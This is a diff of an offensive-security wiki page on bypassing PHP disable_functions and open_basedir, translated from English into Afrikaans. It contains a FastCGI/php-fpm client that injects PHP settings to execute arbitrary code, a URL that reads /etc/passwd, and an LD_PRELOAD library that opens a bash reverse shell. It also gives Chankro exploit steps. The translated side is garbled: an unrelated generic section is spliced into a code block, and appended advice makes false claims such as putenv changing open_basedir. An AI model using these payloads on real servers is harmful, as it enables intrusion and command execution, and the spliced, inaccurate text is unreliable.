-        fwrite($this->_sock, $request);
-        do {
-            $resp = $this->readPacket();
-            if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
-                $response .= $resp['content'];
-            }
-        } while ($resp && $resp['type'] != self::END_REQUEST);
-        var_dump($resp);
-        if (!is_array($resp)) {
-            throw new Exception('Bad request');
-        }
-        switch (ord($resp['content']{4})) {
-            case self::CANT_MPX_CONN:
-                throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]');
-                break;
-            case self::OVERLOADED:
-                throw new Exception('New request rejected; too busy [OVERLOADED]');
-                break;
-            case self::UNKNOWN_ROLE:
-                throw new Exception('Role value not known [UNKNOWN_ROLE]');
-                break;
-            case self::REQUEST_COMPLETE:
-                return $response;
-        }
-    }
+const VERSION_1            = 1;
+const BEGIN_REQUEST        = 1;
+const ABORT_REQUEST        = 2;
+const END_REQUEST          = 3;
+const PARAMS               = 4;
+const STDIN                = 5;
+const STDOUT               = 6;
+const STDERR               = 7;
+const DATA                 = 8;
+const GET_VALUES           = 9;
+const GET_VALUES_RESULT    = 10;
+const UNKNOWN_TYPE         = 11;
+const MAXTYPE              = self::UNKNOWN_TYPE;
+const RESPONDER            = 1;
+const AUTHORIZER           = 2;
+const FILTER               = 3;
+const REQUEST_COMPLETE     = 0;
+const CANT_MPX_CONN        = 1;
+const OVERLOADED           = 2;
+const UNKNOWN_ROLE         = 3;
+const MAX_CONNS            = 'MAX_CONNS';
+const MAX_REQS             = 'MAX_REQS';
+const MPXS_CONNS           = 'MPXS_CONNS';
+const HEADER_LEN           = 8;
+/**
+* Socket
+* @var Resource
+*/
+private $_sock = null;
+/**
+* Host
+* @var String
+*/
+private $_host = null;
+/**
+* Port
+* @var Integer
+*/
+private $_port = null;
+/**
+* Keep Alive
+* @var Boolean
+*/
+private $_keepAlive = false;
+/**
+* Constructor
+*
+* @param String $host Host of the FastCGI application
+* @param Integer $port Port of the FastCGI application
+*/
+public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket
+{
+$this->_host = $host;
+$this->_port = $port;
+}
+/**
+* Define whether or not the FastCGI application should keep the connection
+* alive at the end of a request
+*
+* @param Boolean $b true if the connection should stay alive, false otherwise
+*/
+public function setKeepAlive($b)
+{
+$this->_keepAlive = (boolean)$b;
+if (!$this->_keepAlive && $this->_sock) {
+fclose($this->_sock);
+}
+}
+/**
+* Get the keep alive status
+*
+* @return Boolean true if the connection should stay alive, false otherwise
+*/
+public function getKeepAlive()
+{
+return $this->_keepAlive;
+}
+/**
+* Create a connection to the FastCGI application
+*/
+private function connect()
+{
+if (!$this->_sock) {
+//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);
+$this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5);
+if (!$this->_sock) {
+throw new Exception('Unable to connect to FastCGI application');
+}
+}
+}
+/**
+* Build a FastCGI packet
+*
+* @param Integer $type Type of the packet
+* @param String $content Content of the packet
+* @param Integer $requestId RequestId
+*/
+private function buildPacket($type, $content, $requestId = 1)
+{
+$clen = strlen($content);
+return chr(self::VERSION_1)         /* version */
+. chr($type)                    /* type */
+. chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
+. chr($requestId & 0xFF)        /* requestIdB0 */
+. chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */
+. chr($clen & 0xFF)             /* contentLengthB0 */
+. chr(0)                        /* paddingLength */
+. chr(0)                        /* reserved */
+. $content;                     /* content */
+}
+/**
+* Build an FastCGI Name value pair
+*
+* @param String $name Name
+* @param String $value Value
+* @return String FastCGI Name value pair
+*/
+private function buildNvpair($name, $value)
+{
+$nlen = strlen($name);
+$vlen = strlen($value);
+if ($nlen < 128) {
+/* nameLengthB0 */
+$nvpair = chr($nlen);
+} else {
+/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
+$nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
+}
+if ($vlen < 128) {
+/* valueLengthB0 */
+$nvpair .= chr($vlen);
+} else {
+/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
+$nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
+}
+/* nameData & valueData */
+return $nvpair . $name . $value;
+}
+/**
+* Read a set of FastCGI Name value pairs
+*
+* @param String $data Data containing the set of FastCGI NVPair
+* @return array of NVPair
+*/
+private function readNvpair($data, $length = null)
+{
+$array = array();
+if ($length === null) {
+$length = strlen($data);
+}
+$p = 0;
+while ($p != $length) {
+$nlen = ord($data{$p++});
+if ($nlen >= 128) {
+$nlen = ($nlen & 0x7F << 24);
+$nlen |= (ord($data{$p++}) << 16);
+$nlen |= (ord($data{$p++}) << 8);
+$nlen |= (ord($data{$p++}));
+}
+$vlen = ord($data{$p++});
+if ($vlen >= 128) {
+$vlen = ($nlen & 0x7F << 24);
+$vlen |= (ord($data{$p++}) << 16);
+$vlen |= (ord($data{$p++}) << 8);
+$vlen |= (ord($data{$p++}));
+}
+$array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen);
+$p += ($nlen + $vlen);
+}
+return $array;
+}
+/**
+* Decode a FastCGI Packet
+*
+* @param String $data String containing all the packet
+* @return array
+*/
+private function decodePacketHeader($data)
+{
+$ret = array();
+$ret['version']       = ord($data{0});
+$ret['type']          = ord($data{1});
+$ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});
+$ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});
+$ret['paddingLength'] = ord($data{6});
+$ret['reserved']      = ord($data{7});
+return $ret;
+}
+/**
+* Read a FastCGI Packet
+*
+* @return array
+*/
+private function readPacket()
+{
+if ($packet = fread($this->_sock, self::HEADER_LEN)) {
+$resp = $this->decodePacketHeader($packet);
+$resp['content'] = '';
+if ($resp['contentLength']) {
+$len  = $resp['contentLength'];
+while ($len && $buf=fread($this->_sock, $len)) {
+$len -= strlen($buf);
+$resp['content'] .= $buf;
+}
+}
+if ($resp['paddingLength']) {
+$buf=fread($this->_sock, $resp['paddingLength']);
+}
+return $resp;
+} else {
+return false;
+}
+}
+/**
+* Get Informations on the FastCGI application
+*
+* @param array $requestedInfo information to retrieve
+* @return array
+*/
+public function getValues(array $requestedInfo)
+{
+$this->connect();
+$request = '';
+foreach ($requestedInfo as $info) {
+$request .= $this->buildNvpair($info, '');
+}
+fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));
+$resp = $this->readPacket();
+if ($resp['type'] == self::GET_VALUES_RESULT) {
+return $this->readNvpair($resp['content'], $resp['length']);
+} else {
+throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
+}
+}
+/**
+* Execute a request to the FastCGI application
+*
+* @param array $params Array of parameters
+* @param String $stdin Content
+* @return String
+*/
+public function request(array $params, $stdin)
+{
+$response = '';
+$this->connect();
+$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
+$paramsRequest = '';
+foreach ($params as $key => $value) {
+$paramsRequest .= $this->buildNvpair($key, $value);
+}
+if ($paramsRequest) {
+$request .= $this->buildPacket(self::PARAMS, $paramsRequest);
+}
+$request .= $this->buildPacket(self::PARAMS, '');
+if ($stdin) {
+$request .= $this->buildPacket(self::STDIN, $stdin);
+}
+$request .= $this->buildPacket(self::STDIN, '');
+fwrite($this->_sock, $request);
+do {
+$resp = $this->readPacket();
+if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
+$response .= $resp['content'];
+}
+} while ($resp && $resp['type'] != self::END_REQUEST);
+var_dump($resp);
+if (!is_array($resp)) {
+throw new Exception('Bad request');
+}
+switch (ord($resp['content']{4})) {
+case self::CANT_MPX_CONN:
+throw new Exception('Hierdie app kan nie multiplex nie [CANT_MPX_CONN]');
+break;
+case self::OVERLOADED:
+throw new Exception('Nuwe versoek afgekeur; te besig [OVERLOADED]');
+break;
+case self::UNKNOWN_ROLE:
+throw new Exception('Rolwaarde onbekend [UNKNOWN_ROLE]');
+break;
+case self::REQUEST_COMPLETE:
+return $response;
+}
+}
 }
 ?>
 "; // php payload -- Doesnt do anything
+$code = ""; // php payload -- Doen niks nie
 $php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";
 //$php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php";
 $params = array(
-        'GATEWAY_INTERFACE' => 'FastCGI/1.0',
-        'REQUEST_METHOD'    => 'POST',
-        'SCRIPT_FILENAME'   => $filepath,
-        'SCRIPT_NAME'       => $req,
-        'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
-        'REQUEST_URI'       => $uri,
-        'DOCUMENT_URI'      => $req,
+'GATEWAY_INTERFACE' => 'FastCGI/1.0',
+'REQUEST_METHOD'    => 'POST',
+'SCRIPT_FILENAME'   => $filepath,
+'SCRIPT_NAME'       => $req,
+'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
+'REQUEST_URI'       => $uri,
+'DOCUMENT_URI'      => $req,
 #'DOCUMENT_ROOT'     => '/',
-        'PHP_VALUE'         => $php_value,
-        'SERVER_SOFTWARE'   => '80sec/wofeiwo',
-        'REMOTE_ADDR'       => '127.0.0.1',
-        'REMOTE_PORT'       => '9985',
-        'SERVER_ADDR'       => '127.0.0.1',
-        'SERVER_PORT'       => '80',
-        'SERVER_NAME'       => 'localhost',
-        'SERVER_PROTOCOL'   => 'HTTP/1.1',
-        'CONTENT_LENGTH'    => strlen($code)
-        );
+'PHP_VALUE'         => $php_value,
+'SERVER_SOFTWARE'   => '80sec/wofeiwo',
+'REMOTE_ADDR'       => '127.0.0.1',
+'REMOTE_PORT'       => '9985',
+'SERVER_ADDR'       => '127.0.0.1',
+'SERVER_PORT'       => '80',
+'SERVER_NAME'       => 'localhost',
+'SERVER_PROTOCOL'   => 'HTTP/1.1',
+'CONTENT_LENGTH'    => strlen($code)
+);
 // print_r($_REQUEST);
 // print_r($params);
 //echo "Call: $uri\n\n";
 echo $client->request($params, $code)."\n";
 ?>
 ```
-
-This scripts will communicate with **unix socket of php-fpm** (usually located in /var/run if fpm is used) to execute arbitrary code. The `open_basedir` settings will be overwritten by the **PHP\_VALUE** attribute that is sent.\
-Note how `eval` is used to execute the PHP code you send inside the **cmd** parameter.\
-Also note the **commented line 324**, you can uncomment it and the **payload will automatically connect to the given URL and execute the PHP code** contained there.\
-Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` to get the content of the `/etc/passwd` file.
+Hierdie skrip sal kommunikeer met die **unix-socket van php-fpm** (gewoonlik geleë in /var/run as fpm gebruik word) om willekeurige kode uit te voer. Die `open_basedir` instellings sal oorskryf word deur die **PHP\_VALUE** eienskap wat gestuur word.\
+Let op hoe `eval` gebruik word om die PHP-kode wat jy stuur binne die **cmd** parameter uit te voer.\
+Let ook op die **uitgekommentarieerde lyn 324**, jy kan dit onuitgekommentarieer en die **payload sal outomaties verbind met die gegewe URL en die PHP-kode** wat daar bevat word, uitvoer.\
+Besoek net `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` om die inhoud van die `/etc/passwd` lêer te kry.
 
 {% hint style="warning" %}
-You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting.
+Jy mag dalk dink dat net soos ons die `open_basedir` konfigurasie oorskryf het, kan ons ook **`disable_functions` oorskryf**. Wel, probeer dit, maar dit sal nie werk nie, blykbaar kan **`disable_functions` slegs gekonfigureer word in 'n `.ini` php** konfigurasie lêer en die veranderinge wat jy maak met PHP\_VALUE sal nie effektief wees vir hierdie spesifieke instelling nie.
 {% endhint %}
 
-## disable\_functions Bypass
+## disable\_functions Oorloop
 
-If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\
-So, lets see how you can bypass this restriction (if you can)
+As jy PHP-kode kan uitvoer binne 'n masjien, wil jy waarskynlik na die volgende vlak gaan en **willekeurige stelselopdragte uitvoer**. In hierdie situasie is dit gewoonlik om te ontdek dat die meeste of al die PHP **funksies** wat toelaat om **stelselopdragte uit te voer, gedeaktiveer is** in **`disable_functions`.**\
+Kom ons kyk hoe jy hierdie beperking kan oorloop (as jy kan)
 
-### Automatic bypass discovery
+### Outomatiese oorloop-ontdekking
 
-You can use the tool [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser) and it will indicate you which function (if any) you can use to **bypass** **`disable_functions`**.
+Jy kan die instrument [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser) gebruik en dit sal aandui watter funksie (as enige) jy kan gebruik om **`disable_functions` te oorloop**.
 
-### Bypassing using other system functions
+### Oorloop deur ander stelsel funksies te gebruik
 
-Just return to the beginning of this page and **check if any of the command executing functions isn't disabled and available in the environment**. If you find just 1 of them, you will be able to use it to execute arbitrary system commands.
+Gaan net terug na die begin van hierdie bladsy en **kyk of enige van die opdrag uitvoerende funksies nie gedeaktiveer is en beskikbaar is in die omgewing nie**. As jy een van hulle vind, sal jy dit kan gebruik om willekeurige stelselopdragte uit te voer.
 
-### LD\_PRELOAD bypass
+### LD\_PRELOAD oorloop
 
-It's well known that some functions in PHP like `mail()`are going to **execute binaries inside the system**. Therefore, you can abuse them using the environment variable `LD_PRELOAD` to make them load an arbitrary library that can execute anything.
+Dit is algemeen bekend dat sommige funksies in PHP soos `mail()` **binêre lêers binne die stelsel sal uitvoer**. Jy kan hulle dus misbruik deur die omgewingsveranderlike `LD_PRELOAD` te gebruik om hulle 'n willekeurige biblioteek te laat laai wat enigiets kan uitvoer.
 
-#### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
+#### Funksies wat gebruik kan word om disable\_functions met LD\_PRELOAD te oorloop
 
 * **`mail`**
-* **`mb_send_mail`**: Effective when the `php-mbstring` module is installed.
-* **`imap_mail`**: Works if `php-imap` module is present.
-* **`libvirt_connect`**: Requires the `php-libvirt-php` module.
-* **`gnupg_init`**: Utilizable with the `php-gnupg` module installed.
-* **`new imagick()`**: This class can be abused to bypass restrictions. Detailed exploitation techniques can be found in a comprehensive [**writeup here**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/).
+* **`mb_send_mail`**: Effektief wanneer die `php-mbstring` module geïnstalleer is.
+* **`imap_mail`**: Werk as die `php-imap` module teenwoordig is.
+* **`libvirt_connect`**: Vereis die `php-libvirt-php` module.
+* **`gnupg_init`**: Bruikbaar met die geïnstalleerde `php-gnupg` module.
+* **`new imagick()`**: Hierdie klas kan misbruik word om beperkings te oorloop. Gedetailleerde uitbuitingstegnieke kan gevind word in 'n omvattende [**verslag hier**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/).
 
-You can [**find here**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py) the fuzzing script that was used to find those functions.
-
-Here is a library you can compile to abuse the `LD_PRELOAD` env variable:
+Jy kan [**hier**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py) die fuzzer-skrip vind wat gebruik is om daardie funksies te vind.
 
+Hier is 'n biblioteek wat jy kan saamstel om die `LD_PRELOAD` omgewingsveranderlike te misbruik:
 ```php
 #include 
 #include 
@@ -556,19 +556,18 @@ Here is a library you can compile to abuse the `LD_PRELOAD` env variable:
 #include 
 
 uid_t getuid(void){
-	unsetenv("LD_PRELOAD");
-	system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
-	return 1;
+unsetenv("LD_PRELOAD");
+system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
+return 1;
 }
 ```
+#### Deurloop deur Chankro
 
-#### Bypass using Chankro
+Om van hierdie konfigurasie-misbruik gebruik te maak, kan jy [**Chankro**](https://github.com/TarlogicSecurity/Chankro) gebruik. Dit is 'n instrument wat 'n PHP-uitbuiting sal **genereer** wat jy moet oplaai na die kwesbare bediener en dit uitvoer (toegang daartoe verkry via die web).\
+**Chankro** sal binne die slagofferskyf die **biblioteek en die omgekeerde dop** skryf wat jy wil uitvoer en sal die\*\*`LD_PRELOAD`-truk + PHP `mail()`\*\* funksie gebruik om die omgekeerde dop uit te voer.
 
-In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit** that you need to upload to the vulnerable server and execute it (access it via web).\
-**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the\*\*`LD_PRELOAD` trick + PHP `mail()`\*\* function to execute the reverse shell.
-
-Note that in order to use **Chankro**, `mail` and `putenv` **cannot appear inside the `disable_functions` list**.\
-In the following example you can see how to **create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro\_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit** is going to be called **bicho.php** (that's the file you need to upload to the victims server):
+Let daarop dat om **Chankro** te gebruik, `mail` en `putenv` **nie binne die `disable_functions`-lys mag voorkom nie**.\
+In die volgende voorbeeld kan jy sien hoe om 'n **Chankro-uitbuiting** te **skep** vir **argitektuur 64**, wat `whoami` sal uitvoer en die uitset in _/tmp/chankro\_shell.out_ sal stoor, Chankro sal die **biblioteek en die nutslading** in _/tmp_ skryf en die **finale uitbuiting** sal **bicho.php** genoem word (dit is die lêer wat jy na die slagofferserver moet oplaai):
 
 {% tabs %}
 {% tab title="shell.sh" %}
@@ -576,45 +575,105 @@ In the following example you can see how to **create a chankro exploit** for **a
 #!/bin/sh
 whoami > /tmp/chankro_shell.out
 ```
-{% endtab %}
+# PHP Nuttige Funksies: disable_functions & open_basedir Bypass
 
-{% tab title="Chankro" %}
+Hierdie dokument bevat 'n paar nuttige PHP-funksies wat gebruik kan word om die `disable_functions`-en `open_basedir`-beperkings te omseil tydens webtoepassingstoetsing.
+
+## disable_functions
+
+Die `disable_functions`-instelling in die PHP-konfigurasie beperk die toegang tot sekere funksies wat potensieel gevaarlik kan wees vir die bedryfstelsel of die bediener. Hier is 'n paar maniere om hierdie beperking te omseil:
+
+### 1. Shell_exec
+
+`shell_exec` is 'n funksie wat gebruik kan word om 'n stelselopdrag uit te voer. As dit uitgeskakel is, kan jy probeer om dit te omseil deur die volgende metodes te gebruik:
+
+- `system`
+- `exec`
+- `popen`
+- `passthru`
+- `proc_open`
+
+### 2. Eval
+
+`eval` is 'n funksie wat gebruik kan word om dinamiese kode uit te voer. As dit uitgeskakel is, kan jy probeer om dit te omseil deur die volgende metodes te gebruik:
+
+- `create_function`
+- `assert`
+- `preg_replace` met die `e`-vlag
+
+### 3. Other Functions
+
+Daar is ook ander funksies wat jy kan probeer om die `disable_functions`-beperking te omseil:
+
+- `mail` (deur 'n aangepaste SMTP-bediener te gebruik)
+- `putenv` (om omgewingsveranderlikes te stel)
+- `ini_set` (om PHP-instellings te verander)
+- `dl` (om dinamiese biblioteke te laai)
+
+## open_basedir Bypass
+
+Die `open_basedir`-instelling in die PHP-konfigurasie beperk die toegang tot lêers en gidses buite 'n spesifieke gids. Hier is 'n paar maniere om hierdie beperking te omseil:
+
+### 1. File Upload
+
+As die webtoepassing lêeroplaaifunksionaliteit het, kan jy probeer om die `open_basedir`-beperking te omseil deur die volgende metodes te gebruik:
+
+- Lêeroplaai na 'n gids binne die toegelate gids
+- Lêeroplaai na 'n gids buite die toegelate gids en dan gebruik maak van 'n lêerinsluitingsfout om toegang tot die lêer te verkry
+
+### 2. Symlinks
+
+As die bediener symlinks toelaat, kan jy probeer om die `open_basedir`-beperking te omseil deur die volgende metodes te gebruik:
+
+- Skep 'n simboliese skakel na 'n gids buite die toegelate gids
+- Skep 'n simboliese skakel na 'n lêer buite die toegelate gids
+
+### 3. Directory Traversal
+
+As die webtoepassing 'n directory traversal kwesbaarheid het, kan jy probeer om die `open_basedir`-beperking te omseil deur die volgende metodes te gebruik:
+
+- Gebruik van `../` om na 'n gids buite die toegelate gids te navigeer
+- Gebruik van URL-encodes om die `../`-teken te omseil
+
+## Slotwoord
+
+Hierdie is slegs 'n paar van die moontlike metodes om die `disable_functions`-en `open_basedir`-beperkings in PHP te omseil. Dit is belangrik om te onthou dat die omseiling van hierdie beperkings nie noodwendig wettig of eties is nie en slegs gebruik moet word vir wettige toepassings soos webtoepassingstoetsing.
 ```bash
 python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php
 ```
 {% endtab %}
 {% endtabs %}
 
-If you find that **mail** function is blocked by disabled functions, you may still be able to use the function **mb\_send\_mail.**\
-More information about this technique and Chankro here: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/)
+As jy vind dat die **mail**-funksie geblokkeer word deur gedeaktiveerde funksies, kan jy steeds die funksie **mb\_send\_mail** gebruik.\
+Meer inligting oor hierdie tegniek en Chankro hier: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/)
 
-### "Bypass" using PHP capabilities
+### "Bypass" deur PHP-vermoëns te gebruik
 
-Note that using **PHP** you can **read and write files, create directories and change permissions**.\
-You can even **dump databases**.\
-Maybe using **PHP** to **enumerate** the box you can find a way to escalate privileges/execute commands (for example reading some private ssh key).
+Let daarop dat jy met **PHP** lêers kan **lees en skryf, gidslys kan skep en toestemmings kan verander**.\
+Jy kan selfs **databasisse dump**.\
+Dalk kan jy deur **PHP** te gebruik om die boks te **enumerate**, 'n manier vind om voorregte te verhoog/opdragte uit te voer (byvoorbeeld deur 'n private ssh-sleutel te lees).
 
-I have created a webshell that makes very easy to perform this actions (note that most webshells will offer you this options also): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
+Ek het 'n webshell geskep wat dit baie maklik maak om hierdie aksies uit te voer (let daarop dat die meeste webshells jou hierdie opsies ook sal bied): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
 
-### Modules/Version dependent bypasses
+### Modules/Weergawe-afhanklike omseilings
 
-There are several ways to bypass disable\_functions if some specific module is being used or exploit some specific PHP version:
+Daar is verskeie maniere om disable\_functions te omseil as 'n spesifieke module gebruik word of 'n spesifieke PHP-weergawe uitgebuit word:
 
 * [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)
-* [**Bypass with FFI - Foreign Function Interface enabled**](broken-reference/)
-* [**Bypass via mem**](disable\_functions-bypass-via-mem.md)
+* [**Omseiling met FFI - Foreign Function Interface enabled**](broken-reference/)
+* [**Omseiling via mem**](disable\_functions-bypass-via-mem.md)
 * [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
-* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
-* [**dl function**](disable\_functions-bypass-dl-function.md)
-* [**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)
-  * 5.\* - exploitable with minor changes to the PoC
-  * 7.0 - all versions to date
-  * 7.1 - all versions to date
-  * 7.2 - all versions to date
-  * 7.3 - all versions to date
-  * 7.4 - all versions to date
-  * 8.0 - all versions to date
-* [**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)
+* [**PHP Perl-uitbreiding Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
+* [**dl-funksie**](disable\_functions-bypass-dl-function.md)
+* [**Hierdie uitbuiting**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)
+* 5.\* - vatbaar vir klein veranderinge aan die PoC
+* 7.0 - alle weergawes tot op hede
+* 7.1 - alle weergawes tot op hede
+* 7.2 - alle weergawes tot op hede
+* 7.3 - alle weergawes tot op hede
+* 7.4 - alle weergawes tot op hede
+* 8.0 - alle weergawes tot op hede
+* [**Vanaf 7.0 tot 8.0 uitbuiting (slegs Unix)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)
 * [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)
 * [**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)
 * [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md)
@@ -622,24 +681,23 @@ There are several ways to bypass disable\_functions if some specific module is b
 * [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md)
 * [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)
 * [**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)
-* [**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md)
+* [**PHP 5.2 FOpen-uitbuiting**](disable\_functions-bypass-php-5.2-fopen-exploit.md)
 * [**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md)
 
-### **Automatic Tool**
+### **Outomatiese hulpmiddel**
 
-The following script tries some of the methods commented here:\
+Die volgende skrips probeer sommige van die hier besproke metodes:\
 [https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
 
-## Other Interesting PHP functions
+## Ander interessante PHP-funksies
 
-### List of functions which accept callbacks
+### Lys van funksies wat terugroepings aanvaar
 
-These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used. 
+Hierdie funksies aanvaar 'n stringparameter wat gebruik kan word om 'n funksie van die aanvaller se keuse te roep. Afhangend van die funksie mag die aanvaller wel of nie die vermoë hê om 'n parameter oor te dra nie. In daardie geval kan 'n Inligtingslek-funksie soos phpinfo() gebruik word.
 
 [Callbacks / Callables ](https://www.php.net/manual/en/language.types.callable.php)
 
-[Following lists from here](https://stackoverflow.com/questions/3115559/exploitable-php-functions)
-
+[Volgende lys vanaf hier](https://stackoverflow.com/questions/3115559/exploitable-php-functions)
 ```php
 // Function => Position of callback arguments
 'ob_start' => 0,
@@ -675,11 +733,9 @@ These functions accept a string parameter which could be used to call a function
 'sqlite_create_aggregate' => array(2, 3),
 'sqlite_create_function' => 2,
 ```
+### Inligting Openbaarmaking
 
-### Information Disclosure
-
-Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.
-
+Die meeste van hierdie funksie-oproepe is nie lekke nie. Maar dit kan 'n kwesbaarheid wees as enige van die teruggevoerde data sigbaar is vir 'n aanvaller. As 'n aanvaller phpinfo() kan sien, is dit beslis 'n kwesbaarheid.
 ```php
 phpinfo
 posix_mkfifo
@@ -699,9 +755,73 @@ getmyinode
 getmypid
 getmyuid
 ```
+### Ander
 
-### Other
+Hier is 'n lys van ander nuttige PHP-funksies wat gebruik kan word vir die omseil van `disable_functions` en `open_basedir` beperkings:
 
+#### `dl()`
+
+Die `dl()`-funksie kan gebruik word om dinamiese biblioteke in PHP te laai. Dit kan gebruik word om beperkte funksies te omseil deur 'n biblioteek te laai wat die gewenste funksionaliteit bied.
+
+```php
+dl('path/to/library.so');
+```
+
+#### `putenv()`
+
+Die `putenv()`-funksie kan gebruik word om omgewingsveranderlikes in te stel. Dit kan gebruik word om die `open_basedir`-beperking te omseil deur die waarde van die `open_basedir`-veranderlike te verander.
+
+```php
+putenv('open_basedir=/path/to/directory');
+```
+
+#### `proc_open()`
+
+Die `proc_open()`-funksie kan gebruik word om 'n nuwe proses te skep. Dit kan gebruik word om beperkte funksies te omseil deur 'n proses te skep wat die gewenste funksionaliteit bied.
+
+```php
+$descriptorspec = array(
+   0 => array("pipe", "r"),  // stdin is 'n pyp waarop die kind kan lees
+   1 => array("pipe", "w"),  // stdout is 'n pyp waarop die kind kan skryf
+   2 => array("pipe", "w")   // stderr is 'n pyp waarop die kind kan skryf
+);
+
+$process = proc_open('command', $descriptorspec, $pipes);
+```
+
+#### `system()`
+
+Die `system()`-funksie kan gebruik word om 'n stelseloproepe uit te voer. Dit kan gebruik word om beperkte funksies te omseil deur 'n stelseloproepe uit te voer wat die gewenste funksionaliteit bied.
+
+```php
+system('command');
+```
+
+#### `shell_exec()`
+
+Die `shell_exec()`-funksie kan gebruik word om 'n opdrag in die skulpruimte uit te voer. Dit kan gebruik word om beperkte funksies te omseil deur opdragte uit te voer wat die gewenste funksionaliteit bied.
+
+```php
+shell_exec('command');
+```
+
+#### `popen()`
+
+Die `popen()`-funksie kan gebruik word om 'n proses te skep en 'n pyp daarop te open. Dit kan gebruik word om beperkte funksies te omseil deur 'n proses te skep wat die gewenste funksionaliteit bied.
+
+```php
+$handle = popen('command', 'r');
+```
+
+#### `mail()`
+
+Die `mail()`-funksie kan gebruik word om e-posse te stuur. Dit kan gebruik word om beperkte funksies te omseil deur e-posse te stuur wat die gewenste funksionaliteit bevat.
+
+```php
+mail('recipient@example.com', 'Subject', 'Message');
+```
+
